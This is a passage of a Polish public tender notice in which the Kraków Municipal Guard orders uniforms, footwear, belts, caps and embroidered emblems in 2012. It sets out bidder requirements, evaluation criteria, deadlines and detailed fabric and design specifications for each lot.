<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia ww. warunku nastąpi na podstawie załączonego do oferty oświadczenia Wykonawcy potwierdzającego spełnienie warunków określonych w art. 22 ust. 1 Ustawy, zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wzory oferowanych elementów umundurowania;
a do części 1, 2, 3 i 14 próbki materiału z atestami.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 40</li>
<li>2 - Jakość - 40</li>
<li>3 - Gwarancja - 10</li>
<li>4 - Termin - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2012 godzina 09:30, miejsce: Straż Miejska Miasta Krakowa
ul. Dobrego Pasterza 116
31-416 Kraków
pok. 315.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> kurtka olimpijka
marynarka dwurzędowa
spodnie tropik
spódnica tropik
spódnica gabardyna
spodenki dla rowerzystów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 - kurtka olimpijka                                     - 39 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka olimpijka - materiał gabardyna o gramaturze 480 gr/mb ( przy szer. tkaniny142 cm), kolor ciemny granat, na podszewce, na plecach dwie fałdy, szerokie szlufki na pas, ściągacze gumowe po bokach, zapinanie na guziki kryte listwą, dwie kieszenie z mieszkiem  zamykane klapkami, na lewej kieszeni 7,5 cm poniżej guzika metalowego przyszyty mały ,czarny guzik (podtrzymujący identyfikator),  na pagonach oraz przy kieszeniach i rękawach - małe guziki metalowe koloru złotego z wizerunkiem orła.
      Termin dostawy: 21 maja 2012 r.

              - marynarka dwurzędowa                          -   4 szt. CPV 18.23.00.00-0
?Marynarka: materiał - elanowełna o gramaturze od 450 do 480g/mb (przy szerokości tkaniny 142 cm), 45% wełny 55%elany (? 1%), rodzaj splotu - gabardyna, kolor identyczny z kolorem spodni, zapinana na guziki metalowe w kolorze złotym ze stylizowanym wizerunkiem orła,  kieszeń wewnętrzna, dwie kieszenie zewnętrzne wpuszczane z patką, naramienniki zapinane na guziki metalowe w kolorze złotym ze stylizowanym wizerunkiem orła.
      Termin dostawy: 21 maja 2012 r.

               - spodnie tropik                                          - 115 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 18.23.40.00-8
Spodnie: krój prosty z lampasem koloru żółtego, z przodu dwie kieszenie w karczkach biodrowych, z tyłu jedna kieszonka z wypustką na guzik, podwójne szlufki na pasek i pas główny, zapięcie specjalne regulujące obwód pasa, rozporek zapinany na guziki kryty plisą, materiał - elana 55%, wełna 45%, gramatura 360 g/mb (przy szer. tkaniny 142 cm), kolor ciemny granat
     Termin dostawy: 21 maja 2012 r.
                                  
              - spódnica tropik                                         -  2 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 18.23.20.00-4
Spódnica tropik: krój prosty szyta na indywidualne wymiary pracownic,  z przodu i z tyłu spódnicy po dwie zaszewki, zamek błyskawiczny wszyty w szwie z tyłu, rozcięcie zakładane z tyłu. Spódnica szyta bez paska, wykończona obłożeniem z tkaniny zasadniczej, całość na podszewce. Spódnica posiada 4 podwójne podtrzymywacze paska - na pasek i pas główny, materiał - tropik:  poliester 55%, wełna 45%, gramatura 360 gr/mb , kolor ciemny granat
     Termin dostawy: 21 maja 2012 r.
                                  
               -  spódnica gabardynowa                            -  7 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.23.20.00-4
Spódnica gabardyna: krój prosty szyta na indywidualne wymiary pracownic,  z przodu i z tyłu spódnicy po dwie zaszewki, zamek błyskawiczny wszyty w szwie z tyłu, rozcięcie zakładane z tyłu. Spódnica szyta bez    paska, wykończona obłożeniem z tkaniny zasadniczej, całość na podszewce. Spódnica posiada 4 podwójne podtrzymywacze paska - na pasek i pas główny, materiał - gabardyna:  poliester 55%, wełna 45%, gramatura 480 gr/mb , kolor ciemny granat
     Termin dostawy: 21 maja 2012 r.

	- spodenki dla rowerzystów			 - 56 szt. CPV 18.23.30.00-1
Spodnie krótkie wykonane z tkaniny elanobawełny (65% poliester, 35% bawełna, gramatura 270 g/m2) w kolorze czarnym, z przodu 2 kieszenie w karczkach biodrowych, z przodu na wysokości uda 2 kieszenie naszyte z mieszkiem, kryte patką zapinaną na rzep. Góra spodni wykończona paskiem szerokości 4 cm, zapięcie specjalne regulujące obwód pasa. W pasek wszyte 5 podtrzymywaczy (szlufki) na szeroki pas główny. Rozporek zapinany na guziki. Wzmocnione w kroku.
     Termin dostawy: 14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-8, 18.23.00.00-0, 18.23.40.00-8, 18.23.20.00-4, 18.23.30.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mundur polowy
spodnie do munduru polowego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - mundur polowy                                         -  1 kpl
                        Oznaczenie przedmiotu zamówienia wg CPV 35.81.20.00-9
Typowa kurtka policyjno - wojskowa zapinana na guziki kryte plisą, materiał w kolorze b. ciemny granat,       4 kieszenie zewnętrzne  z przodu,  zapinane na guziki kryte plisą, pagony na ramionach zapinane na guziki, oznakowanie: napis STRAŻ MIEJSKA -minimalna wys. liter -25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle, patka na blachę na lewej  kieszeni.
Spodnie - materiał w kolorze b. ciemny granat, na szelkach, 6 kieszeni ( 2 z przodu, wpuszczane w karczek biodrowy, 4 kieszenie naszywane, zapinane na guziki  kryte plisą, umieszczone na udach z przodu i z tyłu, po dwie na każdej z  nogawek), ściągacz gumowy na nogawkach, wzmocnione w kroku, rozporek zapinany na zamek błyskawiczny kryty plisą.
Materia typu FOREMAN: 67% poliester, 33% bawełna, gramatura min. 252g/m2.
      Termin dostawy:  21 maja 2012 r.

             - spodnie do munduru polowego                -  5 szt. CPV 35.81.20.00-9
Spodnie - materiał w kolorze b. ciemny granat, na szelkach, 6 kieszeni ( 2 z przodu, wpuszczane w karczek biodrowy, 4 kieszenie naszywane, zapinane na guziki  kryte plisą, umieszczone na udach z przodu i z tyłu, po dwie na każdej z  nogawek), ściągacz gumowy na nogawkach, wzmocnione w kroku, rozporek zapinany na zamek błyskawiczny kryty plisą.
Materiał typu FOREMAN: 67% poliester, 33% bawełna, gramatura  min. 252g/m2.
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 35.81.20.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> kurtka przeciwdeszczowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 -  kurtka przeciwdeszczowa                        -  152 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.21.10.00-1
Kurtka ? prosta, materiał - 100% poliester o gramaturze 101g/m2, kolor ciemny granat, szlifowany i powlekany żywicami z apreturą wodoodporną. Krój - w dole nakładane kieszenie z możliwością wkładania ręki z góry i z boku, zamykane patką na rzep. Całość zapinana na zamek kostkowy błyskawiczny kryty plisą, zapinaną na napy. W stójce chowany kaptur. Z przodu i z tyłu  napis STRAŻ MIEJSKA.. Oznakowanie: minimalna wys. liter - 25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle.
     Pokrowiec z szerokimi szlufkami na pas główny.
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.21.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> koszulka polo
koszulka T-shirt.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 4 - koszulka polo                                          - 24 szt.
                   Oznaczenie przedmiotu zamówienia wg CPV 18.33.30.00-2
Koszulka polo z krótkim rękawem, kolor ciemny granat  - materiał 80% bawełna / 20% poliester, gramatura min. 220 g/m2, rozpinana na 3 guziki, rękawki wykończone ściągaczem, na ramionach pagony zapinane na guzik, materiał elanobawełna w kolorze koszulki, na lewej piersi patka na blachę, oznakowanie: na żółtym odblaskowym tle litery w kolorze srebrnym napis Straż Miejska, z tyłu minimalna wysokość liter 50 mm i z przodu 25 mm.
W cenie należy uwzględnić koszt naszycia na obu rękawkach emblematów, które zostaną  przekazane przez Straż Miejską wybranemu w trybie przetargu Wykonawcy 
      Termin dostawy:  21 maja 2012 r.

             - koszulka T-shirt                                              - 426 szt.   
                  Oznaczenie przedmiotu zamówienia wg CPV 18.33.00.00-8
 Koszulka bawełniana (100% bawełna) gramatura - 180 gr/m2,  kolor bardzo ciemny granat, bez nadruków.    
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.30.00-2, 18.33.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> koszule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 5 -  koszula służbowa (niebieska, dł. rękaw)    -  158 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, zapięcie wykończone imitacją plisy,  jedna kieszeń nie zapinana. Kolor niebieski.
      Termin dostawy:  21 maja 2012 r.

              - koszula letnia (niebieska, kr. rękaw)        - 187 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula w kolorze niebieskim - materiał 55% bawełna, 45% poliester, dwie kieszenie z mieszkiem i klapką zapinaną na guzik,, zapięcie wykończone imitacją plisy, na ramionach pagony. Powyżej lewej kieszeni należy wszyć klapkę o wym. 4,5 x 8 cm służącą do umocowania identyfikatora; na wysokości 1/3 od górnej krawędzi wykonać otwór obszyty nitką w kolorze koszuli .Klapka umieszczona na wys. 1,5 cm nad patką kieszeni, zapinana w dolnej części na rzep. 
      Termin dostawy:  21 maja 2012 r.

              - koszula letnia ( biała, kr. rękaw)             -  23 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, dwie kieszenie z mieszkiem i klapką zapinaną na guzik, patka na blachę - jak wyżej , zapięcie wykończone imitacją plisy, na ramionach pagony. Kolor biały.
      Termin dostawy:  21 maja 2012 r.

              - koszula służbowa (biała, dł. rękaw)        -  14 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, zapięcie wykończone imitacją plisy, jedna kieszeń nie zapinana. Kolor biały.
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Półbuty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 6 -  półbuty damskie                     		-  40 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.81.50.00-5
     Półbuty damskie skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, cholewka  gładka bez
     przeszyć.
      Termin dostawy:  21 maja 2012 r.
     
                -  półbuty damskie wyjściowe (czółenka) -  6 par CPV 18.81.50.00-5
     Czółenka damskie(klasyczne) skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, przyszwa
    gładka bez  przeszyć ozdobnych, lekko zwężająca  w zaokrąglony nosek z delikatnym zadarciem  w górę.
    Wysokość obcasa (cm): ok.5.5, rodzaj obcasa: słupek zwężający się z góry w dół.
    Termin dostawy:  21 maja 2012 r.

 	 -  półbuty męskie                                   - 97 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.81.50.00-5
     Półbuty męskie skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, cholewka  gładka bez
     przeszyć
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.50.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Trzewiki specjalne całoroczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 7 - trzewiki specjalne całoroczne            -  107 par
               Oznaczenie przedmiotu zamówienia wg CPV 18.81.52.00-7
Cholewka wykonana ze skóry naturalnej - bukat bydlęcy wodoodporny, skóra licowa, dwoina 1,8-2,0 mm
 w kolorze czarnym, o wysokości min 20 cm od obcasa w wzwyż, sznurowana na uchwyty obuwnicze(system
 szybkiego sznurowania) po osiem z każdej strony, sznurowadła czarne, okrągłe. Język miechowy i kołnierz 
wykonany ze skóry świńskiej, zmiękczonej pianką PU. Kołnierz o wys. 6 cm,  wypełniony pianką lateksową 
przeszyty dwukrotnie pojedynczym szwem. Cholewka typu derbowego, w miejscu szycia rygli wzmocniona
 nitami. Podnosek utwardzony z materiału termoplastycznego. Podszewka ze skóry naturalnej 0,9-1,1 mm. 
 Podpodeszwa wykonana z materiału podpodeszwowego. Wkładka wymienna. Podeszwa czarna, gumowa,
 trudnościeralna, olejoodporna i antypoślizgowa typu WIBRAM, łączona z cholewką metodą klejenia,
 przyszywana oraz gwoździowana na czubkach i piętach.
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.81.52.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Wyroby rymarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 8 - wyroby rymarskie  Oznaczenie przedmiotu zamówienia wg CPV 18.91.00.00-1
                - pas główny - srebrna klamra                   -  55 szt.
 Pas główny wykonany ze skóry bydlęcej licowej przebarwionej na wskroś, koloru czarnego z zamkniętą mizdrą, o grubości 3,0 - 3,5 mm. Na pasie ozdobne wyszycie (oficerskie), wyszycie podszyte dwoiną bydlęcą welurową, całość szyta nicią poliestrową koloru czarnego. Szerokość pasa 45 mm. Brzegi zamalowane farbą, błyszczącą, wykończeniową. Okucia pasa koloru srebrnego (sprzączka, knopiki, nity)
      Termin dostawy:  21 maja 2012 r.

    -  pas wąski -  srebrna klamra                    -  53 szt.
Pasek wąski wykonany ze skóry bydlęcej licowej, przebarwionej na wskroś, koloru czarnego z zamkniętą mizdrą, o grubości 2,5 - 3,0 mm. Pasek obszyty  nicią poliestrową koloru czarnego. Szerokość paska 30 mm. Brzegi paska zamalowane farbą, błyszczącą, wykończeniową. Okucia  paska koloru srebrnego (sprzączka, nity).       
      Termin dostawy:  21 maja 2012 r.

          -  saszetka na dokumenty                     -  32 szt.
Saszetka wykonana ze skóry świńskiej licowej, przebarwionej na wskroś, koloru czarnego, o grubości 1,4 - 1,6 mm. Okucia w kolorze czarny nikiel ( zatrzaski, nity), wymiary: 16 x 13x 5 cm, uchwyt na pas główny nitowany
Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.91.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Skarpety.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 9 -  skarpety letnie                                    - 826 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.31.70.00-4
      Skarpety męskie niekurczliwe w kolorze ciemny granat, bawełna 100%  z komfortowym ściągaczem i płaskim
      szwem.
      Termin dostawy:  14 maja 2012 r.

               - skarpety sportowe                      		 - 160 par CPV 18.31.70.00-4
      Skarpety męskie frotte  w kolorze: białym, materiał:  bawełna 80% + poliamid 20%  ze ściągaczem
      i płaskim  szwem.
     Termin dostawy:  14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.31.70.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Czapki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 10  -  czapki   Oznaczenie przedmiotu zamówienia wg CPV 18.42.33.20-5
                  -  czapka garnizonowa                         -  30 szt.(22- zwykłe, 8 - 1 galon)
Czapka garnizonowa - materiał gabardyna w kolorze ciemny granat, otok w kolorze żółto - granatowym, orzełek metalowy ze wstęgą i napisem  STRAŻ MIEJSKA  w kolorze żółtym, daszek lakierowany na czarno, nad daszkiem czarny pasek skórzany przypięty do otoku dwoma małymi guzikami metalowymi z wizerunkiem orła w kolorze żółtym. 
      Termin dostawy:  21 maja 2012 r.

             -  czapka letnia                                      -  118 szt.  
Czapka letnia typ (baseball) w kolorze ciemny granat z otokiem żółto - granatowym oraz z  wyhaftowanym mechanicznie emblematem orła ze wstęgą  i napisem STRAŻ MIEJSKA  w kolorze żółtym, posiadająca miękki potnik i regulację z tyłu.
      Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.33.20-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Krawat służbowy bezpieczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 11 -  krawat służbowy - bezpieczny            - 150 szt.
                  Oznaczenie przedmiotu zamówienia wg CPV 18.42.30.00-0
      Krawat żakardowy gładki w kolorze ciemny granat, typ bezpieczny  ( zapinany na rzep), szerokość
     w dolnej części - 9,5 cm.
    Termin dostawy:  21 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.30.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> emblemat STRAŻ MIEJSKA
znak identyfikacyjny haftowany.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 12 - emblemat Straż Miejska 		- 3000 szt. CPV 18.42.00.00-9
Emblemat miasta Krakowa w kształcie wydłużonego owalu o wymiarach 9,5 cm x 11,5 cm wykonany techniką haftu komputerowego, tło bardzo ciemny granat, obszycie koloru żółtego, według wzoru używanego przez Straż Miejską Miasta Krakowa
      Termin dostawy:  14 maja 2012 r.

	 - znak identyfikacyjny, haftowany 	- 427 kpl. (kpl - 2 znaki haftowane i 5      podkładów z rzepem) CPV 18.42.00.00-9
Znak identyfikacyjny, haftowany, mocowany na rzepie z indywidualnym numerem i nazwą miejscowości KRAKÓW. Wymiar patki 7,5 cm x 8,5 cm w kolorze bardzo ciemny granat. Znak identyfikacyjny w kształcie owalu o wymiarach 7 cm x 6 cm, z wizerunkiem orła i szarfą koloru żółtego z napisem STRAŻ MIEJSKA, wykonany nicią metalizowaną w kolorze złotym o wzmożonym reżimie użytkowym, tj. umożliwiającym pranie i konserwację w temp. do 90 st. C. Numer indywidualny, nazwa miejscowości w kolorze czarnym na białym tle.
      Termin dostawy:  14 maja 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.42.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Jakość - 40</li>
<li>3. Gwarancja - 10</li>
<li>4. Termin - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> buty sportowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 13 - Buty sportowe rowerowe 		- 70 par CPV 18.82.00.00-3
Sznurowane, oddychająca wierzchnia warstwa buta, podeszwa środkowa z systemem SPD i podeszwa
gumowa poprawiające skuteczność pedałowania i wygodę chodzenia, schowek na sznurowadło chroni przed ich wkręceniem w łańcuch, łatwa do zdjęcia płytka podeszwy. Kolor czarny z elementami odblaskowymi.
      Termin dostawy:  14 maja 2012 r.

	- Buty sportowe (patrol wodny) 		- 15 par CPV 18.82.00.00-3
Sznurowane, oddychająca wierzchnia warstwa buta, podeszwa środkowa i podeszwa gumowa poprawiające wygodę chodzenia, schowek na sznurowadło. Kolor jednolity czarny.
      Termin dostawy:  14 maja 2012 r..</p></li>
